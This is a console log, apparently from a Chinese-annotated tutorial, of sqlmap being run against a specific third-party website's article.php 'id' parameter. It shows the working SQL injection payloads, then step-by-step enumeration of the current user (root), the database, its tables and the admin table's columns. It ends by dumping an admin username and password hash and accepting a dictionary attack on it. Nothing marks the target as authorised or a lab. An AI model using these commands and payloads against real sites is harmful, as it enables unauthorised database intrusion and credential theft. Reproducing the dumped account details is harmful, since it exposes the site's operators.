D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin |
| article |
| contributor |
| idea |
| image |
| issue |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| password | varchar(32) |
| type | varchar(10) |
| userid | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password | userid |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |